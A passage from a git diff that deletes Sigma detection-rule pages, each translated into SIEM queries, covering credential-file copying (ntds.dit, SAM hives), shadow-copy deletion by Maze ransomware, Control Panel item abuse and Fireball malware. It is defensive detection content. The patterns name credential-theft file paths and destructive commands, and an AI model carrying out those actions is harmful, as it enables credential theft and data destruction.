-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Cmd.exe CommandLine Path Traversal'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentCommandLine.keyword:*cmd*\/c* AND CommandLine.keyword:*\/..\/..\/*)
-```
-
-
-### splunk
-    
-```
-(ParentCommandLine="*cmd*/c*" CommandLine="*/../../*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentCommandLine="*cmd*/c*" CommandLine="*/../../*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*cmd.*/c.*)(?=.*.*/\.\./\.\./.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_control_panel_item.md b/Atomic_Threat_Coverage/Detection_Rules/win_control_panel_item.md
deleted file mode 100644
index 3c41551..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_control_panel_item.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Control Panel Items       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the malicious use of a control panel item |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1196: Control Panel Items](https://attack.mitre.org/techniques/T1196)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Control Panel Items
-id: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4
-status: experimental
-description: Detects the malicious use of a control panel item
-reference:
-    - https://attack.mitre.org/techniques/T1196/
-    - https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins
-tags:
-    - attack.execution
-    - attack.t1196
-    - attack.defense_evasion
-    - attack.t1218
-author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-date: 2020/06/22
-level: critical
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection1:
-        CommandLine: '*.cpl'
-    filter:
-        CommandLine:
-            - '*\System32\\*'
-            - '*%System%*'
-    selection2:
-        CommandLine:
-            - '*reg add*'
-    selection3:
-        CommandLine:
-            - '*CurrentVersion\\Control Panel\\CPLs*'
-    condition: (selection1 and not filter) or (selection2 and selection3)
-falsepositives:
-    - Unknown
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "CommandLine.*.*.cpl" -and  -not (($_.message -match "CommandLine.*.*\\System32\\.*" -or $_.message -match "CommandLine.*.*%System%.*"))) -or (($_.message -match "CommandLine.*.*reg add.*") -and ($_.message -match "CommandLine.*.*CurrentVersion\\Control Panel\\CPLs.*")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.CommandLine.keyword:*.cpl AND (NOT (winlog.event_data.CommandLine.keyword:(*\\System32\\* OR *%System%*)))) OR (winlog.event_data.CommandLine.keyword:(*reg\ add*) AND winlog.event_data.CommandLine.keyword:(*CurrentVersion\\Control\ Panel\\CPLs*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0ba863e6-def5-4e50-9cea-4dd8c7dc46a4 <<EOF
-{
-  "metadata": {
-    "title": "Control Panel Items",
-    "description": "Detects the malicious use of a control panel item",
-    "tags": [
-      "attack.execution",
-      "attack.t1196",
-      "attack.defense_evasion",
-      "attack.t1218"
-    ],
-    "query": "((winlog.event_data.CommandLine.keyword:*.cpl AND (NOT (winlog.event_data.CommandLine.keyword:(*\\\\System32\\\\* OR *%System%*)))) OR (winlog.event_data.CommandLine.keyword:(*reg\\ add*) AND winlog.event_data.CommandLine.keyword:(*CurrentVersion\\\\Control\\ Panel\\\\CPLs*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.CommandLine.keyword:*.cpl AND (NOT (winlog.event_data.CommandLine.keyword:(*\\\\System32\\\\* OR *%System%*)))) OR (winlog.event_data.CommandLine.keyword:(*reg\\ add*) AND winlog.event_data.CommandLine.keyword:(*CurrentVersion\\\\Control\\ Panel\\\\CPLs*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Control Panel Items'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((CommandLine.keyword:*.cpl AND (NOT (CommandLine.keyword:(*\\System32\\* *%System%*)))) OR (CommandLine.keyword:(*reg add*) AND CommandLine.keyword:(*CurrentVersion\\Control Panel\\CPLs*)))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*.cpl" NOT ((CommandLine="*\\System32\\*" OR CommandLine="*%System%*"))) OR ((CommandLine="*reg add*") (CommandLine="*CurrentVersion\\Control Panel\\CPLs*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((CommandLine="*.cpl"  -(CommandLine IN ["*\\System32\\*", "*%System%*"])) OR (CommandLine IN ["*reg add*"] CommandLine IN ["*CurrentVersion\\Control Panel\\CPLs*"])))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\.cpl)(?=.*(?!.*(?:.*(?=.*(?:.*.*\System32\\.*|.*.*%System%.*))))))|.*(?:.*(?=.*(?:.*.*reg add.*))(?=.*(?:.*.*CurrentVersion\\Control Panel\\CPLs.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_copying_sensitive_files_with_credential_data.md b/Atomic_Threat_Coverage/Detection_Rules/win_copying_sensitive_files_with_credential_data.md
deleted file mode 100644
index d39e70d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_copying_sensitive_files_with_credential_data.md
+++ /dev/null
@@ -1,196 +0,0 @@
-| Title                    | Copying Sensitive Files with Credential Data       |
-|:-------------------------|:------------------|
-| **Description**          | Files with well-known filenames (sensitive files with credential data) copying |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/](https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/)</li><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li><li>[https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/](https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>car.2013-07-001</li><li>attack.t1003.002</li><li>attack.t1003.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Copying Sensitive Files with Credential Data
-id: e7be6119-fc37-43f0-ad4f-1f3f99be2f9f
-description: Files with well-known filenames (sensitive files with credential data) copying
-status: experimental
-author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/22
-modified: 2019/11/13
-references:
-    - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-    - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - car.2013-07-001
-    - attack.t1003.002
-    - attack.t1003.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        - Image|endswith: '\esentutl.exe'
-          CommandLine|contains:
-            - 'vss'
-            - ' /m '
-            - ' /y '
-        - CommandLine|contains:
-            - '\windows\ntds\ntds.dit'
-            - '\config\sam'
-            - '\config\security'
-            - '\config\system '  # space needed to avoid false positives with \config\systemprofile\
-            - '\repair\sam'
-            - '\repair\system'
-            - '\repair\security'
-            - '\config\RegBack\sam'
-            - '\config\RegBack\system'
-            - '\config\RegBack\security'
-    condition: selection
-falsepositives:
-    - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\esentutl.exe" -and ($_.message -match "CommandLine.*.*vss.*" -or $_.message -match "CommandLine.*.* /m .*" -or $_.message -match "CommandLine.*.* /y .*")) -or ($_.message -match "CommandLine.*.*\\windows\\ntds\\ntds.dit.*" -or $_.message -match "CommandLine.*.*\\config\\sam.*" -or $_.message -match "CommandLine.*.*\\config\\security.*" -or $_.message -match "CommandLine.*.*\\config\\system .*" -or $_.message -match "CommandLine.*.*\\repair\\sam.*" -or $_.message -match "CommandLine.*.*\\repair\\system.*" -or $_.message -match "CommandLine.*.*\\repair\\security.*" -or $_.message -match "CommandLine.*.*\\config\\RegBack\\sam.*" -or $_.message -match "CommandLine.*.*\\config\\RegBack\\system.*" -or $_.message -match "CommandLine.*.*\\config\\RegBack\\security.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\esentutl.exe AND winlog.event_data.CommandLine.keyword:(*vss* OR *\ \/m\ * OR *\ \/y\ *)) OR winlog.event_data.CommandLine.keyword:(*\\windows\\ntds\\ntds.dit* OR *\\config\\sam* OR *\\config\\security* OR *\\config\\system\ * OR *\\repair\\sam* OR *\\repair\\system* OR *\\repair\\security* OR *\\config\\RegBack\\sam* OR *\\config\\RegBack\\system* OR *\\config\\RegBack\\security*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e7be6119-fc37-43f0-ad4f-1f3f99be2f9f <<EOF
-{
-  "metadata": {
-    "title": "Copying Sensitive Files with Credential Data",
-    "description": "Files with well-known filenames (sensitive files with credential data) copying",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "car.2013-07-001",
-      "attack.t1003.002",
-      "attack.t1003.003"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\esentutl.exe AND winlog.event_data.CommandLine.keyword:(*vss* OR *\\ \\/m\\ * OR *\\ \\/y\\ *)) OR winlog.event_data.CommandLine.keyword:(*\\\\windows\\\\ntds\\\\ntds.dit* OR *\\\\config\\\\sam* OR *\\\\config\\\\security* OR *\\\\config\\\\system\\ * OR *\\\\repair\\\\sam* OR *\\\\repair\\\\system* OR *\\\\repair\\\\security* OR *\\\\config\\\\RegBack\\\\sam* OR *\\\\config\\\\RegBack\\\\system* OR *\\\\config\\\\RegBack\\\\security*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\esentutl.exe AND winlog.event_data.CommandLine.keyword:(*vss* OR *\\ \\/m\\ * OR *\\ \\/y\\ *)) OR winlog.event_data.CommandLine.keyword:(*\\\\windows\\\\ntds\\\\ntds.dit* OR *\\\\config\\\\sam* OR *\\\\config\\\\security* OR *\\\\config\\\\system\\ * OR *\\\\repair\\\\sam* OR *\\\\repair\\\\system* OR *\\\\repair\\\\security* OR *\\\\config\\\\RegBack\\\\sam* OR *\\\\config\\\\RegBack\\\\system* OR *\\\\config\\\\RegBack\\\\security*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Copying Sensitive Files with Credential Data'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\esentutl.exe AND CommandLine.keyword:(*vss* * \/m * * \/y *)) OR CommandLine.keyword:(*\\windows\\ntds\\ntds.dit* *\\config\\sam* *\\config\\security* *\\config\\system * *\\repair\\sam* *\\repair\\system* *\\repair\\security* *\\config\\RegBack\\sam* *\\config\\RegBack\\system* *\\config\\RegBack\\security*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\esentutl.exe" (CommandLine="*vss*" OR CommandLine="* /m *" OR CommandLine="* /y *")) OR (CommandLine="*\\windows\\ntds\\ntds.dit*" OR CommandLine="*\\config\\sam*" OR CommandLine="*\\config\\security*" OR CommandLine="*\\config\\system *" OR CommandLine="*\\repair\\sam*" OR CommandLine="*\\repair\\system*" OR CommandLine="*\\repair\\security*" OR CommandLine="*\\config\\RegBack\\sam*" OR CommandLine="*\\config\\RegBack\\system*" OR CommandLine="*\\config\\RegBack\\security*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\esentutl.exe" CommandLine IN ["*vss*", "* /m *", "* /y *"]) OR CommandLine IN ["*\\windows\\ntds\\ntds.dit*", "*\\config\\sam*", "*\\config\\security*", "*\\config\\system *", "*\\repair\\sam*", "*\\repair\\system*", "*\\repair\\security*", "*\\config\\RegBack\\sam*", "*\\config\\RegBack\\system*", "*\\config\\RegBack\\security*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\esentutl\.exe)(?=.*(?:.*.*vss.*|.*.* /m .*|.*.* /y .*)))|.*(?:.*.*\windows\ntds\ntds\.dit.*|.*.*\config\sam.*|.*.*\config\security.*|.*.*\config\system .*|.*.*\repair\sam.*|.*.*\repair\system.*|.*.*\repair\security.*|.*.*\config\RegBack\sam.*|.*.*\config\RegBack\system.*|.*.*\config\RegBack\security.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_crime_fireball.md b/Atomic_Threat_Coverage/Detection_Rules/win_crime_fireball.md
deleted file mode 100644
index c5aaffc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_crime_fireball.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Fireball Archer Install       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Archer malware invocation via rundll32 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/](https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/)</li><li>[https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100](https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Fireball Archer Install
-id: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d
-status: experimental
-description: Detects Archer malware invocation via rundll32
-author: Florian Roth
-date: 2017/06/03
-references:
-    - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/
-    - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100
-tags:
-    - attack.execution
-    - attack.t1059
-    - attack.defense_evasion
-    - attack.t1085
-    - attack.t1218.011
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '*\rundll32.exe *,InstallArcherSvc'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*\\rundll32.exe .*,InstallArcherSvc") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\\rundll32.exe\ *,InstallArcherSvc
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3d4aebe0-6d29-45b2-a8a4-3dfde586a26d <<EOF
-{
-  "metadata": {
-    "title": "Fireball Archer Install",
-    "description": "Detects Archer malware invocation via rundll32",
-    "tags": [
-      "attack.execution",
-      "attack.t1059",
-      "attack.defense_evasion",
-      "attack.t1085",
-      "attack.t1218.011"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\\\rundll32.exe\\ *,InstallArcherSvc"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\\\rundll32.exe\\ *,InstallArcherSvc",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Fireball Archer Install'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*\\rundll32.exe *,InstallArcherSvc
-```
-
-
-### splunk
-    
-```
-CommandLine="*\\rundll32.exe *,InstallArcherSvc" | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*\\rundll32.exe *,InstallArcherSvc")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\rundll32\.exe .*,InstallArcherSvc'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_crime_maze_ransomware.md b/Atomic_Threat_Coverage/Detection_Rules/win_crime_maze_ransomware.md
deleted file mode 100644
index f297045..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_crime_maze_ransomware.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Maze Ransomware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects specific process characteristics of Maze ransomware word document droppers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1204: User Execution](https://attack.mitre.org/techniques/T1204)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html](https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html)</li><li>[https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/](https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/)</li><li>[https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/](https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Maze Ransomware
-id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052
-status: experimental
-description: Detects specific process characteristics of Maze ransomware word document droppers
-references:
-    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
-    - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/
-    - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/
-author: Florian Roth
-date: 2020/05/08
-tags:
-    - attack.execution
-    - attack.t1204
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    # Dropper
-    selection1:
-        ParentImage|endswith:
-            - '\WINWORD.exe'
-        Image|endswith:
-            - '*.tmp'
-    # Binary Execution
-    selection2:
-        Image|endswith: '\wmic.exe'
-        ParentImage|contains: '\Temp\'
-        CommandLine|endswith: 'shadowcopy delete'
-    # Specific Pattern
-    selection3: 
-        CommandLine|endswith: 'shadowcopy delete'
-        CommandLine|contains: '\..\..\system32'
-    condition: 1 of them
-fields:
-    - ComputerName
-    - User
-    - Image
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "ParentImage.*.*\\WINWORD.exe") -and ($_.message -match "Image.*.*.tmp")) -or ($_.message -match "Image.*.*\\wmic.exe" -and $_.message -match "ParentImage.*.*\\Temp\\.*" -and $_.message -match "CommandLine.*.*shadowcopy delete") -or ($_.message -match "CommandLine.*.*shadowcopy delete" -and $_.message -match "CommandLine.*.*\\..\\..\\system32.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:(*\\WINWORD.exe) AND winlog.event_data.Image.keyword:(*.tmp)) OR (winlog.event_data.Image.keyword:*\\wmic.exe AND winlog.event_data.ParentImage.keyword:*\\Temp\\* AND winlog.event_data.CommandLine.keyword:*shadowcopy\ delete) OR (winlog.event_data.CommandLine.keyword:*shadowcopy\ delete AND winlog.event_data.CommandLine.keyword:*\\..\\..\\system32*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/29fd07fc-9cfd-4331-b7fd-cc18dfa21052 <<EOF
-{
-  "metadata": {
-    "title": "Maze Ransomware",
-    "description": "Detects specific process characteristics of Maze ransomware word document droppers",
-    "tags": [
-      "attack.execution",
-      "attack.t1204"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\WINWORD.exe) AND winlog.event_data.Image.keyword:(*.tmp)) OR (winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.ParentImage.keyword:*\\\\Temp\\\\* AND winlog.event_data.CommandLine.keyword:*shadowcopy\\ delete) OR (winlog.event_data.CommandLine.keyword:*shadowcopy\\ delete AND winlog.event_data.CommandLine.keyword:*\\\\..\\\\..\\\\system32*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:(*\\\\WINWORD.exe) AND winlog.event_data.Image.keyword:(*.tmp)) OR (winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.ParentImage.keyword:*\\\\Temp\\\\* AND winlog.event_data.CommandLine.keyword:*shadowcopy\\ delete) OR (winlog.event_data.CommandLine.keyword:*shadowcopy\\ delete AND winlog.event_data.CommandLine.keyword:*\\\\..\\\\..\\\\system32*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Maze Ransomware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n       Image = {{_source.Image}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:(*\\WINWORD.exe) AND Image.keyword:(*.tmp)) OR (Image.keyword:*\\wmic.exe AND ParentImage.keyword:*\\Temp\\* AND CommandLine.keyword:*shadowcopy delete) OR (CommandLine.keyword:*shadowcopy delete AND CommandLine.keyword:*\\..\\..\\system32*))
-```
-
-
-### splunk
-    
-```
